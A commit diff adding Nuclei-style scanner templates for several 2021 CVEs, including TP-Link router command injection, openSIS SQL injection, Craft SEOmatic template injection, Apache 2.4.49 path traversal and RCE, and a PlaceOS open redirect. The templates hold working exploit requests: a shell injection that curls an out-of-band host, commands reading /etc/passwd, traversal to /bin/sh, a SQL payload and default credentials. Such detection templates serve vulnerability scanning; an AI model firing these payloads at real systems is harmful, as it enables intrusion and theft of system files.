commit

16001-to-17000-templates/CVE-2021-41653.yaml

@@ -0,0 +1,67 @@
+id: CVE-2021-41653
+
+info:
+  name: TP-Link - OS Command Injection
+  author: gy741
+  severity: critical
+  description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
+  remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
+  reference:
+    - https://k4m1ll0.com/cve-2021-41653.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41653
+    - https://www.tp-link.com/us/press/security-advisory/
+    - http://tp-link.com
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-41653
+    cwe-id: CWE-94
+    epss-score: 0.95374
+    epss-percentile: 0.99172
+    cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 2
+    vendor: tp-link
+    product: tl-wr840n_firmware
+  tags: cve,cve2021,tplink,rce,router
+variables:
+  useragent: '{{rand_base(6)}}'
+
+http:
+  - raw:
+      - |
+        POST /cgi?2 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain
+        Referer: http://{{Hostname}}/mainFrame.htm
+        Cookie: Authorization=Basic YWRtaW46YWRtaW4=
+
+        [IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
+        dataBlockSize=64
+        timeout=1
+        numberOfRepetitions=4
+        host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
+        X_TP_ConnName=ewan_ipoe_d
+        diagnosticsState=Requested
+      - |
+        POST /cgi?7 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain
+        Referer: http://{{Hostname}}/mainFrame.htm
+        Cookie: Authorization=Basic YWRtaW46YWRtaW4=
+
+        [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: {{useragent}}"
+
+# digest: 490a004630440220752d1a35c5152419dacd9908a794244472a635bd8142f442d7cc7c88b204879b0220494cf93f6429b61a87d6c82bcd93eed1ea759f32f72eb7adfbbf425ed650b72c:922c64590222798bb761d5b6d8e72950

16001-to-17000-templates/CVE-2021-41691.yaml

@@ -0,0 +1,52 @@
+id: CVE-2021-41691
+
+info:
+  name: openSIS Student Information System 8.0 SQL Injection
+  author: Bartu Utku SARP
+  severity: high
+  description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.
+  remediation: |
+    Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).
+  reference:
+    - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
+    - https://www.exploit-db.com/exploits/50637
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
+  classification:
+    cve-id: CVE-2021-41691
+  metadata:
+    max-request: 2
+  tags: sqli,auth,edb,cve,cve2021,opensis
+variables:
+  num: "999999999"
+
+http:
+  - raw:
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
+      - |
+        POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
+
+    attack: pitchfork
+    payloads:
+      username:
+        - student
+      password:
+        - student@123
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
+          - 'status_code_2 == 200'
+        condition: and
+
+# digest: 4b0a00483046022100d69a704ad325691722917a459e5254a92c6c17b1de1bf9f45e49b81414445ce5022100f9ddad6028eb7b1ad78e82fc59de1d3a40a132b8da744cbf8057af607d694558:922c64590222798bb761d5b6d8e72950

16001-to-17000-templates/CVE-2021-41749.yaml

@@ -0,0 +1,60 @@
+id: CVE-2021-41749
+
+info:
+  name: CraftCMS SEOmatic - Server-Side Template Injection
+  author: iamnoooob,ritikchaddha
+  severity: critical
+  description: |
+    In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.
+  reference:
+    - https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41749
+    - https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-41749
+    cwe-id: CWE-94
+    epss-score: 0.46254
+    epss-percentile: 0.97078
+    cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: nystudio107
+    product: seomatic
+    framework: craft_cms
+    shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"'
+  tags: cve,cve2021,craftcms,cms,ssti
+variables:
+  num1: "{{rand_int(40000, 44800)}}"
+  num2: "{{rand_int(40000, 44800)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"
+  marker: "{{randstr}}"
+
+http:
+  - raw:
+      - |+
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}
+        Cache-Control: max-age=0
+
+      - |+
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb
+        Cache-Control: max-age=0
+
+    skip-variables-check: true
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_1, "/{{marker}}{{result}}") || regex("root:.*:0:0:", body_2)'
+          - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")'
+          - 'status_code == 200'
+        condition: and
+# digest: 490a0046304402203e7ed489ed44dbaf94282ae2b22ff831afb32e7fedc10b06aa445ecd91ac653802202e3fd014457cffd465c17a035306d3f49f3ba9ac5b84ccdbebdc4e0fd9db0dd2:922c64590222798bb761d5b6d8e72950

16001-to-17000-templates/CVE-2021-41773 (2).yaml

@@ -0,0 +1,18 @@
+id: CVE-2021-41773
+info:
+  name: RCE in Apache HTTP Server 2.4.49
+  author: RafaelCaria
+  severity: critical
+  tags: cve,cve2021,rce
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
+    body: 'echo;id'
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b"

16001-to-17000-templates/CVE-2021-41773.yaml

@@ -0,0 +1,64 @@
+id: CVE-2021-41773
+
+info:
+  name: Apache 2.4.49 - Path Traversal and Remote Code Execution
+  author: daffainfo,666asd
+  severity: high
+  description: |
+    A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
+  remediation: |
+    Upgrade Apache to version 2.4.50 or apply the relevant patch provided by the vendor.
+  reference:
+    - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
+    - https://twitter.com/ptswarm/status/1445376079548624899
+    - https://twitter.com/h4x0r_dz/status/1445401960371429381
+    - https://github.com/blasty/CVE-2021-41773
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-41773
+    cwe-id: CWE-22
+    epss-score: 0.97424
+    epss-percentile: 0.99925
+    cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: apache
+    product: http_server
+    shodan-query: Apache 2.4.49
+  tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
+variables:
+  cmd: "echo COP-37714-1202-EVC | rev"
+
+http:
+  - raw:
+      - |
+        GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        echo Content-Type: text/plain; echo; {{cmd}}
+
+    stop-at-first-match: true
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        name: RCE
+        words:
+          - "CVE-2021-41773-POC"
+
+      - type: regex
+        name: LFI
+        regex:
+          - "root:.*:0:0:"
+# digest: 4b0a00483046022100de8497f1c24918a9c7323beae8664ca742c5cbbe3657cab12758caa182e891d1022100fb74960000ce185cdd192c430b79f5f167632783e588f447813ee1a57fe0e4ec:922c64590222798bb761d5b6d8e72950

16001-to-17000-templates/CVE-2021-41826.yaml

@@ -0,0 +1,46 @@
+id: CVE-2021-41826
+
+info:
+  name: PlaceOS 1.2109.1 - Open Redirection
+  author: geeknik
+  severity: medium
+  description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
+  remediation: |
+    Apply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability.
+  reference:
+    - https://github.com/PlaceOS/auth/issues/36
+    - https://www.exploit-db.com/exploits/50359
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41826
+    - http://packetstormsecurity.com/files/164345/PlaceOS-1.2109.1-Open-Redirection.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-41826
+    cwe-id: CWE-601
+    epss-score: 0.93913
+    epss-percentile: 0.98922
+    cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: place
+    product: placeos_authentication
+  tags: redirect,edb,cve,packetstorm,cve2021,placeos
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/auth/logout?continue=//interact.sh"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
+
+      - type: status
+        status:
+          - 302
+          - 301
+        condition: or
+# digest: 4a0a00473045022100d0e3eef1d719b2eb5c45b70f78a97e5f08d65f2710ffb6af5b76c0a8108313af022042150ccc71dc5f934dc0bfc975778815f7def825f498e7317e0b430533fd20cf:922c64590222798bb761d5b6d8e72950

16001-to-17000-templates/CVE-2021-41836.yaml

@@ -0,0 +1,57 @@
+id: CVE-2021-41836
+
+info:
+  name: "Fathom Analytics <= 3.0.4 - Stored Cross-Site Scripting"
+  author: topscoder
+  severity: medium
+  description: "The Fathom Analytics WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and escaping via the $site_id parameter found in the ~/fathom-analytics.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 3.0.4. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled."
+  reference:
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-41836
+    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2641005%40fathom-analytics&new=2641005%40fathom-analytics&sfp_email=&sfph_mail=
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-41836
+  metadata:
+    fofa-query: "wp-content/plugins/fathom-analytics/"
+    google-query: inurl:"/wp-content/plugins/fathom-analytics/"
+    shodan-query: 'vuln:CVE-2021-41836'
+  tags: cve,wordpress,wp-plugin,fathom-analytics,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/fathom-analytics/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "fathom-analytics"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.0.4')